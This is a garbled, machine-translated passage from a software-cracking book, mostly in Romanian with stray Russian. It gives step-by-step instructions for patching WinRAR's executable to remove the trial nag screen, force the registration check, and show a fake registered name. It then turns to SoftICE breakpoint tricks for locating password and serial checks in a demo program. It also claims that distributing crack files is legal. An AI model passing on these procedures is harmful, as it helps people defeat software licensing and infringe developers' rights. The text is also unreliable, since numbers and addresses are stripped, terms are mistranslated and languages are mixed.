schimbate Pentru a face acest lucru, vom avea nevoie de o copie originală a fișierului sursă și deo anumită utilitate pentru o comparație a fișierelor Cele mai populare astăzi sunt profesorul C U Nimnul și Makecrk deDoctor Stein's Labs Prima dintre utilități este mult mai preferabilă, deoarece, în primul rând, procese mai bune nu suntcomplet fișiere CRK standard și, în al doilea rând, vă permite să generați un format HEK extins Pentru a lansa C U înlinia de comandă, indicați numele a două fișiere - versiunea originală și „hacked” După ce utilitatea își va finalizaactivitatea, toate diferențele descoperite vor fi înregistrate în fișierul CRK/XCK Acum vom avea nevoie de o altăutilitate, al cărui scop va fi opusul: utilizarea fișierului CIK, pentru a schimba aceiași octeți în programulinițial Există o mulțime de astfel de utilități astăzi Din păcate, acesta nu este cel mai bun efect asupracompatibilității lor cu diverse formate CRK Cel mai cunoscut dintre ei, cel mai probabil, SGA de profesorul Nimnul șiPcrackerb Doctor Steinm Labs Dar căutarea unui program adecvat care susține formatul dvs CRK este deja grija unuiutilizator care decide să pună programul Pe parcurs, observăm că distribuția fișierelor CRK nu este o încălcare și nueste pedepsită prin lege, deoarece astfel de fișiere nu sunt un instrument de hacking Acestea conțin informații despremodul de implementare a acestui hack De acord că, dacă spunem că „o lovitură dintr -un pistol în templu duce la moarteaunei persoane”, atunci niciunul dintre anchetatori nu ne va putea răspunde pentru acest lucru Însă utilizatorul care adecis să -ți folosească Krak -ul, poate apărea probleme cu legea, deoarece încalcă drepturile de autor asupradezvoltatorilor programului Paradoxal, însă, avem o lume!Pentru a evita problemele de compatibilitate, acestea folosescuneori fișiere executabile (C U este capabil să genereze astfel de) care să efectueze modificarea automat a programului(și adesea ocupă mai puțin spațiu!) Dar principalul lor dezavantaj este că dosarul executabil în conformitate cu legilenoastre nu mai este informații, ci un instrument de crimă și Prin urmare, nu poate fi răspândită legal Ei bine, am făcuto treabă grozavă și probabil am învățat multe lucruri noi A fost o protecție foarte simplă și încă așteptam foarte multtimp, Dar o cale interesantă Un exemplu practic de hacking pentru a învăța hacking -ul pe o protecție simplă Un exemplu deastfel de protecție este implementat în Winrar Archiver, care suntem acum în programul complet Efectuând acest exemplu,veți învăța cum să utilizați un editor hex, un arhipion și un dizassembler În ceea ce privește principiile colaborăriicu debuggerul, acestea vor fi luate în considerare în capitolul Versiunea proaspăt stabilită a Winrar funcționeazătimp de de zile, după care începe să necesite înregistrarea la fiecare început prin aruncarea așa-numitului ecran NAG(Fig ) Este vorba despre utilizatori foarte enervanți, ceea ce le provoacă o dorință naturală de a elimina acestecran Partea a II -a Tehnici de bază de hacking fig Ecranul cu cerințade înregistrare afișată de Winrar Archiver după ce perioada de testare a expirat ca exemplu pentru hacking, a fostselectată versiunea , la care este menționată de http://www rarsoft com/rar/wrar exe Toate celelalte versiunisunt hacked într -un mod similar, doar deplasările octeților „protectori” vor fi diferite Pentru a face hacking, vețiavea nevoie de orice editor hexadecimal (de exemplu, Hiew), Ari-Spy Kerberos , IDA Pro DizAssembler și Resource Editor(de exemplu, încorporat în Microsoft Visual Studio) Diverse versiuni ale Hiew au o dispunere diferită a tastelor„fierbinți”, ceea ce creează o anumită confuzie Vom folosi versiunea gratuită , care nu are restricțiifuncționale Versiunile recente ale Hiew sunt distribuite în mod comercial Suprimarea ecranului NAG Orice casetă dedialog nu este afișată pe cont propriu, ci este afișată de o anumită funcție ari Crearea unei funcții ari care afișeazăNAG, vom putea să-i asigurăm codul de protecție care îl provoacă și să analizăm condițiile care determină aspectulNAG Există multe funcții ARI asociate cu dialoguri: Creedialog, DialogBox, MessageBox, etc Care dintre ele a utilizatdezvoltatorul Winrar?Pentru a nu ghici, vom folosi o arhivă El va arăta totul Cu toate acestea, înainte de a începeactivitatea SPY, vom configura filtrul, astfel încât Kerberos să renunțe la apeluri ari neinformative care să strângăfișierul de raport Для этого откроем файл ke spy txt и закомментируем следующие функции: TlsGetValue, DefWindowProcA,DispatchMessageA, GetFocus, GetMessageA, SendMessageA, SendMessageW, TranslateAcceleratorA, TranslateAcceleratorw иTranslateMessage (чтобы закомментировать функцию, следует вставить знак перед ее именем) Pentru a îmbunătăți filtrarea,este logic să apăsați butonul Opțiuni și să luați doar raportul Exe apelează (Fig ) Acest lucru vă va permite săcolectați apeluri ARI doar de la winrar exe, dar nu de la DLL încărcat de acesta Dacă acest lucru nu se face, nu se vaîntâmpla nimic groaznic, dar fișierul de raport se va dovedi prea lung și va fi mult mai dificil să îl analizați După cesetați filtrul, apăsați butonul Navigare, indicați calea către catalogul în care este instalat Winrar și apăsați butonulde injectare (Fig ) După ce a așteptat apariția NAG-ecran, închideți Winrar și deschideți fișierul de raportWinrar Rep, care va fi salvat într-un catalog cu Winrar Vezi Capitolul I, „Hacker Tools” GPAVA Încălziți fig Configurarea filtrului prin repornirea Ari-Shpion Kerberos Fig Ari-Spy Kerberos este gata să funcționezefig Studiul codului de protecție folosind IDA Pro DizAssembler Partea II Tehnicile de bază de hacking a unuiraport al unui fișier de raport (lista ) sunt cel mai bine pornit de la sfârșit (până la urmă, ecranul NAG apare înultima tură, când interfața principală a fost deja inițializată) Doar orbul nu dezvăluie funcția funcțieiDialogBoxParama, care ia caseta de dialog numită Memento Ea este cea care creează ecranul enervant : Listarea Фрагмент файла отчета, созданного АРІ-шпионом Kerberos WinRAR exe| B |LoadAcceleratorsA( , ВА :"VIEWACC") retums: E F WinRAR exe| F |DialogBoxParamA( , FE s"REMINDER", , FF , ) retuxns : winrar exej f b | waitforsingleobject ( , a) Retume: Kerberos raportează chiar adresa deretur - A H, ceea ce duce la cod de protecție Ne vom uita aici cu un dizassembler?Descărcați winrar exe în IDA Pro,apăsați tasta (salt la adresa), introduceți adresa de retur din funcție ( a ) și, în sfârșit, faceți clic pe H) În sistemul zecimal H este Aceasta este perioada perioadei demonstrative, datorată noastră prindreapta Acum devine clar sensul „fizic” al variabilei DWORD B C , care conține numărul de zile care au trecut de lainstalarea programului Deci, se găsește „sediul” mecanismului de protecție!Cum vom acționa?Pentru a bloca NAG, deexemplu, puteți înlocui CMP EAX, H ( F ) cu Hog EAX, EAX/PO ( C/ ), atunci EAH va fi întotdeauna zero,indiferent de data actuală reală Aveam nevoie de o echipă de pori pentru a compensa o scădere a lungimii instrucțiunilor(PA ia trei octeți și doar două porci) Gpava cald -up fig Trei octeți care blochează ieșirea pe ecranul NAG,Lansați Hiew, Load Winrar exe, apăsați de două ori tasta pentru a merge la modul de asamblare Apoi apăsăm tasta (goto) și introducem valoarea f - adresa instrucțiunii PA (punctul este necesar pentru a informa editorul căaceasta este adresa și nu deplasarea în fișier) Faceți clic pe pentru a merge la modul de editare (editare), apoi- pentru introducerea instrucțiunilor de asamblare În caseta de dialog care apare, scriem Xor EAX, EAX ESC> Salvăm toate modificările din fișier apăsând și ieșim (Fig ) Lansați Winrar Acum Nag-ecran nu maiapare!Întreaga procedură de hacking nu a durat și zece minute!Ca opțiune, puteți înlocui MOV EAX, DWORD B C (AI C V ) pe MOV EAX, (B despre OO OO), iar apoi Winrar va considera că exact șase zile au trecut întotdeauna de laînregistrare De ce exact șase?Ei bine, nu șase atât de nouă Care este diferența pentru noi?!Principalul lucru este căaceastă valoare nu depășește !De asemenea, puteți înlocui JG Short LOC F F ( F ) cu JMP Short LOC F (EV ),atunci tranziția necondiționată va sări dialogul indiferent de ora curentă Cea mai frumoasă soluție este considerată afi corecții minime Cea mai bună dintre deciziile propuse sunt hackingul a doi octeți, dar puteți mirosi programul cuajutorul unuia Căutarea acestui octet este o lecție pentru un adevărat hacker!Înregistrarea forțată, în ciuda faptuluică ecranul enervant NAG este suprimat cu succes, programul rămâne neînregistrat și scrie sincer în rubrica ferestrei:„Evaluarea către Soru” Și dacă apăsați butonul Despre, vom vedea de zile de încercare Și deși nu există restricții înversiunea demonstrativă, este mult mai plăcut să lucrezi cu o copie înregistrată pur psihologic Se știe că înregistrareaeste efectuată folosind un fișier cheie cu o semnătură electronică generată pe o bază criptografică, astfel încât cheiacheii să fie partea II Tehnica de bază a hackingului era imposibilă Toate acestea sunt așa, dar nu avem nevoie decheia!Vrem doar să stabilim steagul de înregistrare!Cum să -l găsești?Să revenim la listarea Deasuprainstrucțiunilor deja cunoscute ale PE EAX, H este o serie întreagă de tranziții condiționate, în anumite circumstanțecare trec prin această casetă de dialog Evident, unul dintre ei aparține pavilionului de înregistrare (până la urmă,utilizatorii înregistrați de NAG-ecran nu sunt afișați) Cum se identifică această tranziție?Vom acționa conformplanului Alocarea variabilei BYTE A este determinată imediat Când este afișată caseta de dialog, este înregistratăaici Aceasta înseamnă că dialogul a fost deja derivat și nu este necesar să fie redirecționat Cu variabilaDWORD B A este mult mai dificil de descoperit Pentru a afla ce cod este folosit și în ce scop, trebuie să vizualizațilegături încrucișate Aducem cursorul la numele variabilului, apelăm meniul contextual și selectăm elementul Jump la XREFsau doar apăsați tasta Caseta de dialog apare prezentată în Fig XREFS TO DWORD B A FIG Studiullegăturilor încrucișate Ce vedem?Un număr imens de referințe încrucișate pentru citire (D) și înregistrări (W)împrăștiate în tot corpul programului și Printre aceste legături, DEC și INC domină Acest lucru nu seamănă foarte mult cu steagul de înregistrare Cel maiprobabil, acesta este un fel de semafor sălbatic (semafor) utilizat pentru organizarea blocării reciproce (în cazulgeneral, o parte de schimb din interfață) Trei legături încrucișate duc la variabila BYTE B E , dintre care două suntîn imediata apropiere a funcției DODRAGDROP, astfel încât acestea pot fi eliminate imediat Dar variabila byte f bceste o adevărată comoară O mulțime de referințe încrucișate la citire și înregistrare duc la ea, dar toate valorilescrise sunt returnate fie de funcția Sub DB C, fie de funcția Sub a Și o singură legătură duce la echipa MOVBYTE F BC, , bruscă forțată această variabilă La prima vedere la funcția Sub A , liniile de text Rarkey suntizbitoare, proiectate cu atenție de Dizassembler ca comentarii Da!Se pare că aceasta este procedura responsabilă pentruînregistrare (Fig ) Aducem cursorul la începutul său, apăsăm tasta și o redenumim pe Doregister De asemenea,este ușor să faceți față funcției sub db c Este suficient să analizăm codul chiar la începutul funcției Doregister(Lista ) Orez Дизассемблированный код функции DoRegister выявляется присутствием текстовых строк rarkeyЬійстимг е« О? Іага DoRegister proc пеаг А call А Е test А А jz A A mov A A mov A AA mov A B jmp sub DB C al, al short loc A B al, edx,[ebp+var llC] large FS: , EDX LOC A D;Continuați înregistrarea,- Accesați ieșirea dacă funcția sub db c returneazăzero, funcția doregister continuă să se înregistreze Valoarea nenală duce la o ieșire imediată din funcție Este logic săpresupunem că funcția sub db c raportează pur și simplu starea de înregistrare: zero - o copie neînregistrată aprogramului și non -mound - o copie a programului este înregistrată sincer Vom aduce cursorul până la începutul funcțieiSub db c și o redenumim în Isigistered Ce e de facut in continuare?Să facem ca funcția înregistrată să returnezeîntotdeauna valoarea inutilă!Apoi, programul va fi recunoscut ca înregistrat, în ciuda faptului că nu avem un fișiercheie certificat de o semnătură electronică Rulați Hiew, apăsați de două ori de două ori pentru a merge la modulDizAssembler, faceți clic pe tasta , introduceți valoarea db c (adresa funcției IS -Registred) Apoi apăsăm tasta pentru a merge la editare și introducem următoarele comenzi: XOR EAX, EAX INC EAX Retn (Knipte Registrul EAC, mărește imediat cu unul și obțineți în afara funcției) Scriem modificările apăsând tasta șilăsăm Hiew Partea a II -a Tehnici de bază de hacking fig Acum, o copiea Winrar este „înregistrată” lansată Winrar și vede că inscripția „Evaluarea la fereastră” dispare ascultător, iar linia„înregistrată la” apare în fereastra despre despre (Fig ) Nota este adevărată, după ce a adăugat orice fișier laarhivă * Înregistrarea GAGS dispare în mod misterios Și totul pentru că am uitat să remediem echipa MOV BYTE F BC, ,localizată în funcție de deplasarea D H, pe MOV BYTE F BC, Vom face acest lucru, iar apoi inscripția „Evaluareala gunoi” nu va mai apărea niciodată!Clean Hacking sau îmblânzirea inscripției ferestrei ABOOT „înregistrate” este,desigur, bun Cu toate acestea, o întrebare rămâne fără răspuns - cui este înregistrat exact programul Primul lucru careîmi vine în minte este să găsiți programul înregistrat în program (este acolo conform deplasării DBA H) și să -lînlocuiți cu semnătura sa, de exemplu, hacked de KPNC Din păcate, o poreclă mai lungă nu va mai putea găzdui, deoarecelungimea maximă admisă a liniei este rigid limitată Prin urmare, este mai bine să mergeți altfel și să găsiți codul careafișează această linie!În acest scop, porniți Kerberos, încărcați winrar exe și deschideți dialogul despre Winrar Apoiînchidem Winrar exe și urmărim protocolul, la sfârșitul căruia linia Dialogboxparama ( , : „AboutRARDLG”, AA, , ), numit la idh Da, acesta este dialogul nostru despre Winrar!Revenim la IDA Pro șitraversăm adresa specificată (lista ) Listarea Codusul casetei de dialog despre Winrar D Push D Push D C Push D PUSH D D D D D D DSET Sub DWORDABOBOBOMOGOGFuncția IPDialogFunc Sub i , dupăcum promite IDA Pro, este o procedură de fereastră responsabilă pentru ieșirea dialogului Să aruncăm o privire, ce esteacolo?Veți vedea un număr imens de apeluri CPAVA cald -up în funcția setdlgitemtexta De care avem nevoie?Pentrua răspunde la această întrebare, este necesar să aflați identificatorul elementului corespunzător management Lansăm Microsoft Visual Studio (sau orice alt editor de resurse), selectăm comanda Open File, selectațiopțiunea All Lîles în câmpul Tip de fișier și setăm opțiunea Resurse în AS ORP (dacă acest lucru nu se face, fișierul vafi deschis ca dublu, care nu este deloc inclus în planurile noastre) Într -un copac de copac găsim o ramură de dialog,iar în ea - aboutrarrdlg Efectuați un dublu clic pe acest nume (sau faceți clic pe ) Editorul de resurse vaîncepe Printre elementele acestei casete de dialog, găsiți linia SORU de de zile (Fig ), în locul căreia esteafișată linia înregistrată în versiunea înregistrată și, după ce a numit meniul contextual, determinați ID -ul său Înacest caz, acest identificator este (sau H) I Rice Determinarea identificatorului câmpului de ieșire folosind editorul de resurse MicrosoftVisual Studio, analizând listarea DizAssembled, căutăm o astfel de funcție setdlgitemtexta, al cărui argument va fiidentificatorul BBI Această provocare este situată la ESN (lista ) : Listarea Codul care afișează „linia”înregistrată la ” E CAII , PUSH EC PUSH EE PUSH F CAII Sub dc H [EBP+HDLG]setDlgitemtexta;Ipstring;Funcția NLDDLGLTEM Sub - DC Returnează indicatorul la linia de ieșire, care este transmisăimediat de funcțiile setdlgitemtexta Nu vom explora funcția sub dc ca atare Numele utilizatorului înregistrat estepreluat dintr -un fișier cheie pe care îl puteți așeza peste tot restul vieții Este mult mai ușor să introduceți liniadvs în fișierul executabil și să înlocuiți indicatorul Vom fi implementați într -o secțiune de date, în coada căreiaexistă aproape întotdeauna spațiu liber Este imposibil să plasați linia afișată în secțiunea de cod, deoarece Winrarnecesită ca acesta să fie disponibil pe, înregistrare Partea a II -a Tehnici de bază de hacking fig Catalogulsecțiunilor Fig Introducerea unei linii fictive cu numele utilizatorului „înregistrat” Fig Versiunea complethacked și înregistrată a Winrar GPAV Încălziți Deschideți Hiew, cu o singură apăsare a tastei , mergem lamodul hexadecimal, faceți clic pe pentru a afișa antetul fișierului, apoi apăsând apăsând setarea obiectelor(tabelul obiectului) În spatele secțiunii Data se află secțiunea tis (Fig ) Reglam cursorul aici și apăsăm , apoi mutăm mai multe linii în sus, asigurându -ne că nu urcăm în date semnificative care începe unde se terminălanțul zero În cazul nostru, va fi adresa d b h (deși dacă doriți, puteți alege, de exemplu, d ah, d afhetc ) Facem clic pe pentru a merge la modul de editare și pentru a scrie versiunea înregistrată piratată de liniaNezumi (Fig ) Acum trecem la adresa e h, revenind la procedura noastră de fereastră (vezi Lista ) șiînlocuim CAII Sub DC (E FI CB FC FF) pe MOV EAH, D B (B în D ), unde D B H este adresa adresei așirului hacked Salvați modificările în fișier și ieșiți Trucul nostru a funcționat (Fig ) Acum, versiunea hacked nueste diferită de înregistrată legal!Desigur, acest lucru nu înseamnă că acum puteți utiliza Winrar și nu plătiți nimicpentru asta (până la urmă, nimeni nu a anulat legile) Un exemplu a fost dat exclusiv pentru antrenament Concluzie Mulțidezvoltatori folosesc semnături electronice și alte mecanisme criptografice, în speranța că îi vor proteja de hackeriirău intenționați Indiferent cât de!Criptografia, desigur, este un lucru puternic, dar are nevoie de abordarea sa Dacăprogramul se bazează pe steagul de înregistrare (și majoritatea programelor o fac), acesta este hacked elementar deeditarea mai multor octeți, căutarea care durează foarte puțin Capitolul Cunoașterea cu depanarea aproape toată lumeaștie că programele hacking un debugger, dar nu toată lumea știe să facă acest lucru în practică De fapt, nu este nimiccomplicat în acest sens Este suficient să stăpâniți câteva tehnici simple și puteți începe deja să hack Cum funcționeazăexact debuggerul - până acum nu este necesar să știți Întrebarea care trebuie utilizată debugger și în cescop Debuggerul turbo este de fapt destul de primitiv în cercurile utilizatorilor și doar câțiva rup ceva cu ajutorulsău Cel mai puternic și un universal remediu este Softice, acum disponibil pentru toate platformele Windows Așa cum ammenționat deja în șef /pe aprilie , Compuware a anunțat încetarea suportului pentru acest proiect Cea mai recentăversiune a produsului, Driverstudio , acceptă întreaga linie de sisteme de operare Windows (până la Windows Server ), precum și arhitectura AMD X - Aceasta înseamnă că în următorii ani, hackerii vor putea totuși să se bazezepe Softice, dar după aceea Va trebui să venim cu altceva Inițial, debugging -ul a fost înțeles performanța pasului -pas al codului, numită șiTracer Astăzi, programele sunt atât de umflate încât nu are rost să le urmăriți - sunteți imediat sofisticat înjacuzziile procedurilor investite, fără să vă dați seama ce fac de fapt Debuggerul nu este cel mai bun mijloc de astudia algoritmul programului - un dizassembler interactiv (de exemplu, IDA Pro) face față mai bine Vom amâna oconversație detaliată despre dispozitivul debuggerului pentru viitor, iar aici ne vom limita la o listă a principalelorcapacități funcționale ale debuggerilor tipici (fără aceasta este imposibil de utilizat semnificativ): □ Urmărireaapelurilor pentru înregistrare/ citire/execuție la celula (regiunea) de memorie dată, apoi în textul numit după punctulde oprire (puncte de întrerupere) □ Urmărirea apelurilor/citirea porturilor de intrare și ieșire (nu mai este relevantpentru sistemele moderne de operare care interzic aplicațiile utilizatorilor pentru a face astfel de trucuri-acesta esteacum prerogativul driverelor și foarte puține mecanisme de protecție sunt implementate la drivere) □ Urmărireaîncărcării DLL și apelarea funcțiilor specifice de la acestea, inclusiv componentele sistemului După cum veți vedea maitârziu, aceasta este arma principală a unui cracker modern □ Urmărirea apelului de întreruperi software/hardware (în ceamai mare parte nu mai este relevantă - nu atât de multe mecanisme de protecție se degajează întreruperilor) □ Urmărireamesajelor trimise de aplicație către o fereastră specifică □ Căutare contextuală în memorie GPAVA Cunoașterea cudepanarea Introducere în depanarea unui debugger este un instrument incredibil de puternic în mâinile unui cracker,dar are nevoie de abordarea sa Majoritatea hackerilor începători încep să depanseze programul din punctul de intrare, caurmare a căruia întregul proces moare în ciclul de eșantionare a mesajelor Execuția pasului -pas a programului (numit șiTracer) este prea laborioasă și extrem de ineficientă Aplicațiile orientate către evenimente (și aproape toateaplicațiile Windows aparțin) nu sunt depanate Să presupunem că urmărim aplicația MFC, ajungem la apelul Afxwînmain și ne găsim adânc în MFC DLL, de unde este deja apelat întregul cod de utilizator Cu toate acestea, înainte deurmărire, veți avea timp să îmbătrâniți Dar să depanați întregul program complet opțional!Hackerii cu experiențăurmăresc doar părți individuale ale codului de protecție Dar cum o vom găsi în milioane de instrucțiuni ale mașinii alefișierului executabil?Există multe metode: punctele de oprire, promovarea stivei, legături încrucișate, urmărireacondiționată, căutarea directă a parolelor/numerelor de serie în memorie, etc Vă vom spune mai multe detalii despretoate acestea Ca exemplu, vom hack programul LED Drive despre și despre software, a cărui versiune demo de de zilepoate fi descărcată de pe site: http: //www oo-software eom/en/download/ index shtml Dizassembler și debuggerul dintr-o echipă conține aproape fiecare depanator și dizassembler construit - nu vom depune programul direct în codul mașinii,nu?Cu toate acestea, dizassemble -urile construite disponibile în softice sau ollydbg sunt prea primitive și nu oferă oclaritate suficientă Ida Pro este mult mai puternic Acest dizassembler recunoaște automat numele funcțiilor bibliotecii,determină tipurile de variabile locale și face, de asemenea, multe alte lucruri utile În special, IDA Pro vă permite săcomentați lista și să atribuiți note simbolice pentru instrucțiuni și date A explora programele protejate folosind acestDizassembler este o adevărată plăcere Cu toate acestea, apeluri precum CAII [EBX+ HI aduc hackeri la rabie, mai alesdacă funcția este cauzată din diverse puncte cu diverse EBX Puteți petrece întreaga zi pentru a clarifica valoarea EBXîn Dizassembler, în timp ce în debugger este destul de simplu să o „spionați” Luați în considerare un alt exemplu Săpresupunem că ceva este numit în programul studiat la E B D, situat undeva adânc în intestinele sistemului deoperare Vă rugăm să rețineți că, cu depozitele de memorie DizAssembing, veți întâlni astfel de adrese la fiecare pas Îndebugger, este suficient doar pentru a da comanda U E B D, n veți vedea imediat că aceasta este funcțiacreatefilea Nu are sens să argumentăm că debuggerul sau dizassembler este mai rece Aceste instrumente se completeazăreciproc Este mai bine să încredințați reconstrucția algoritmilor către Dizassembler și să clarificăm toate locurile deneînțeles din depanare Softice este încărcat într -un mod destul de nefiresc față de debugger, ceea ce îi face pe mulțiîncepători confuzie (Fig ) În primul rând, fișierul studiat este procesat folosind IDA Pro Apoi, în meniul Fișier,selectați Produceți fișier de ieșire |Produce fișier mar Vă rugăm să rețineți că numele Marfile ar trebui să coincidă cunumele fișierului de dezasamblare în sine LA Setați toate cele trei opțiuni care apar: Informații de segment (segmente), nume autogenedate (nume generate automat) șinume demangled Fileul martor rezultat este procesat de Utilitatea Idasym, care poate fi descărcată de pe site-ulhttp://www idapro com/ și transformat în format Sym Apoi, fișierul SIM obținut este convertit într -un fișier de formatNMS folosind utilitatea NMSYM, care este inclusă în kitul de livrare Softice Deci, jumătate din lucrare estefăcută Acum, în timp ce începe încărcătorul de synibol numega, vă puteți odihni Partea a II -a Tehnici de bază dehacking fig Descărcarea informațiilor simbolice către debugger folosind simbolul Ioder TART || L slmple ene- Far l;• ' : Fig Debugarea unui fișier fără informații simbolice ale GPAV Cunoașterea cu depanarea Fig Debugging FILII cu informații simbolice, generat automat IDA Pro atunci când se va descărca Loader SimbolNumega, selectați OPO din meniul Fișier, deschideți fișierul NMS nou creat și selectați comenzi modulele|Sarcină Simbolurile mesajului pentru C: \ temp \ simple nms încărcat cu succes, care a apărut, spune că totul a mers cusucces Acum puteți deschide fișierul executabil (fișier | opO și modul | încărcare) Comparați cum arată ecranul debuggercu informații simbolice și fără acesta (Fig și ) Fără informații simbolice, scopul funcțiilor este H și H nu este deloc evident și pot petrece câteva ore în depanare Cu informații simbolice, totul este clar șisimplu În plus, numele simbolice pot fi utilizate la punctele de oprire, de exemplu: BPX FGETS (setați punctul deoprire pe funcția de citire a parolei) sau BMP AmyGoodPassword Punctele de oprire ale funcțiilor punctelor ARI aleopririi (sunt, de asemenea, puncte de întrerupere, în expansiunea numită „Bryaks”) - aceasta este arma principală ahackerului în lupta împotriva mecanismelor de protecție Cele mai populare sunt punctele opririi la funcția ari Citireaconținutului ferestrei deseori (dar nu întotdeauna) este realizată de o funcție ari-funcție getWindowTexta, deschidereafișierului-createfliea, descărcarea dinamică a bibliotecii-loadlibarya, etc Debugger O indicație a „depășirii” ori decâte ori protecția încearcă să facă un truc murdar Prin aceasta, își demască locația în codul studiat, aducând hackerulpe traseul ei Problema este că Ari-Funziy este foarte mult și ghiciți în ce modul în care protecția manipulează cufereastra nu este atât de simplă În mod obișnuit, se folosește fie răscumpărarea „mut” a tuturor funcțiilor ARI posibileîn ordine, una după alta, se folosește sau se folosește ari spioni, care arată ceea ce se întâmplă „sub capotă” alprogramului depanat A doua abordare este mult mai eficientă Acesta a fost luat în considerare în capitolul B, când adiscutat procedura pentru hackingul arhivei Winrar Partea a II -a Tehnicile de bază de hacking pentru a instalapunctul de oprire pe funcția ari sunt suficiente pentru a apăsa + și, după ce a așteptat apariția debuggeruluipe ecran, introduceți linia numelui The Function În Softice, punctele opririi sunt globale Dacă stabilim punctul deoprire pe funcția CreateFileA, debuggerul va apărea de fiecare dată când încearcă să deschidă/să creeze oricefișier Asta e bucurie!Pentru a limita fervoarea debuggerului, este necesar să se utilizeze puncte condiționate aleopririi Să presupunem că dorim ca depanatorul să apară fișierul KeyFile key Deschideți documentația MSDN și urmărițiprototipul funcției CreateFile Vedem că indicatorul ipfiiename este transmis în extremă din stânga argumentului Deoareceargumentele funcțiilor ARI sunt introduse în fibră de la dreapta la stânga, indicatorul din numele fișierului deschis vafi în partea de sus a stivei și numai adresa de întoarcere va fi deasupra acesteia Astfel, la momentul apeluluicreatefile, ipfilename, va fi o schimbare în raport cu ESP, iar punctul condiționat al opririi va arăta astfel: BPXCreateFilea dacă (*(ESP-> ) == 'KEYF ') Numele fișierului închis în ghilimele este convertit automat de către depanareîntr-o constantă pe de biți și, prin urmare, lungimea acestuia nu trebuie să depășească octeți Rețineți cădebuggerul este sensibil la registru (astfel, cheie 'și cheie' pentru că nu este același lucru), dar sistemul defișiere nu este în cele mai multe cazuri ale unei comparații parțiale a numelui, este suficient Dacă nu este așa, atunciputeți recurge și compara mai multe reglarea pe biți pentru operația pentru funcționarea sintaxei punctelorcondiționale ale opririi descrise în detaliu în documentația de pe Softice (a se vedea, de exemplu, http://www woodmann crackz/tutorials/siceinst htm, http://www reconstructor org/papers/the% blg% Softlce% howto pdf, precumși documentația furnizată cu softice), astfel încât să nu locuim Pe acesta în detaliu, multe mecanisme de protecție vorrezista punctelor opririi De exemplu, ei pot începe implementarea funcției ARI nu cu Primul octet și, în astfel de cazuri, trebuie să recurgeți la instalarea punctului de oprire pe funcțiile ARI native,care sunt un fel de fundament al sistemului de operare, sub care sunt doar porturi de intrare/ieșire șidrivere Descrierea funcțiilor ARI native poate fi găsită în celebrul „Lista interioară” Ralph Brown (Lista intenupt deRalf Brown, vezi http://www cs cmu edu/~rals html sau în carte „Undocumentare” Funcții ntsots/ "de la Tomasz Nowak),care poate fi găsit la http://undocumeded ntinternals net/ În special, NTCRATRFILE este utilizat pentru a crea/deschidefișiere de opriri, care vă permite să monitorizați aproape orice situații De exemplu, eax == "mypswd" trebuie să vinăatunci când registrul EAH a indicat o linie cu un număr de parolă/serie pe care am introdus -o în timpul înregistrării Aceasta este o metodă universală de hacking care se aplică aproape toată protecția Nici nu a extras conținutulferestrei de editare, la un moment dat nu va încărca inevitabil indicatorul în registru Acesta este debuggerul și vaapărea! Procedura de conformitate cu parolă va fi amplasată undeva în apropiere Desigur, astaRegistrul nu trebuie săfie EAX Este probabil ca compilatorul să fie implicat de EVOS, ESI sau altceva Documentația de pe Ollydbg anunțăsprijinul expresiei R == "MyPSWD", unde R este un registru general Cu toate acestea, acest design nu funcționează înversiunile curente ale debuggerului și toate registrele trebuie sortate manual (bine, puteți scrie propriul pluginautomatizat acest proces) Este posibil pentru oprirea opririlor la ARI, puteți seta punctele opririi funcțiilorbibliotecii În aplicațiile scrise pe Delphi, Builder, MFC, Visual Basic, apelurile directe ARI sunt rareori utilizate Șideși nicio afacere fără funcții ARI, desigur, nu este completă, analiza lor nu oferă puțin Acest lucru este valabil maiales dacă se utilizează un schimb de date dinamice cu o fereastră și alte tehnologii sofisticate GPAVA Cunoașterea cudepanarea Cu toate acestea, funcțiile bibliotecii sunt ușor identificate de IDA Pro, iar punctele de oprire asupralor sunt instalate ca funcții ari obișnuite, cu singura diferență fiind că punctul de oprire este de natură locală, ceeace afectează doar numai numai Cererea depanată Și acest lucru înseamnă că după apăsarea + trebuie să schimbămcontextul de control pentru a intra în spațiul de adrese al aplicației depanate Acest lucru este realizat fie de cătrecomanda Addr Name LROTSES, fie prin instalarea punctului de oprire pe orice funcție Ari cauzată de aplicația depanată Deexemplu, să fie sendmessagea Faceți clic pe + , scrieți срх meggsageboxa, lăsați Softice, așteptați suprafețelesale (dacă debuggerul nu apare, puteți face clic pe mouse -ul prin fereastra programului depanat) Dacă în colțul dindreapta jos al ferestrei de debugger este indicat numele procesului dorit - totul este în regulă, altfel părăsimdebuggerul și așteptăm din nou predarea acestuia Spunem punctele opririi mesajelor, avem o fereastră cu mai multecontroale (meniu, steag sau buton), făcând clic pe care dorim să urmărim (vezi Fig ) Cum să o facă?Foartesimplu!Instalați un punct de oprire pentru un mesaj!În Windows, întreaga interfață este construită pe mesaje (CharlesPetzold a scris bine în cartea sa „Programare pentru Windows ” ) În special, atunci când apăsați elementul de control(sau schimbați fereastra de editare), mesajul WM Command este trimis la fereastră Aici vom pune un punct de oprire peel, dar mai întâi vom determina descriptorul (mânerul) ferestrelor Orez Fereastra pe care este necesară setareapunctului de oprire poate fi făcută fie de către orice spion Windows (de exemplu, Spyxx, care face parte din MicrosoftVisual Studio) sau cu ajutorul Softice (în special, comanda HWND, care afișează Lista tuturor elementelorferestrei) Dacă, ca răspuns la comanda HWND Softice, este afișat mesajul incapabil și fereastra desktop, trebuie săschimbați contextul comenzii ADDR Un fragment din raportul primit ca urmare a unor astfel de acțiuni este prezentat înlista Coloana din stânga conține descriptori ai elementelor ferestrei, dreapta - numele modulelor cu care aparținaceste elemente Numele modulelor nu coincid întotdeauna cu numele proceselor De exemplu, dacă fereastra este PetzoldCh Programare pentru Windows T I - II -St Petersburg: Vygn-St Petersburg, Partea a II-a Tehnicile debază ale hackingului aparțin bibliotecii dinamice, apoi Softice scrie numele DLL, nu procesul principal În exemplulconsiderat, dialogul este procesat de biblioteca OODLRWRS, care poate fi aflată folosind comanda MOD Listarea Determinarea clasei de mâner WinPROC TID Modul VMDROPTARGETCLASS VMDROPTARGETCLASS VMDROPTARGETCLASS VMDROPTARGETCLAS C NDDEAgnt BC # (Dialog) # (Dialog) F BC E F BC E F BC BCVMwareUser VMwareUser VMwareUser VMwareUser winlogon comctl oodlrwrs F FE Button F BC E BC oodlrwrs Button F BC E BC oodlrwrs B F Button F BC E BC oodlrwrs Static F BC E BC oodlrwrs Static E AA BCoodlrwrs Static E AA BC oodlrwrs C Static E AA BC oodlrwrs F Static F BC E BC oodlrwrs A Static E AA BC oodlrwrs F Static E AA BC oodlrwrs Вы видите, три интересующих нас элементауправления (кнопки) 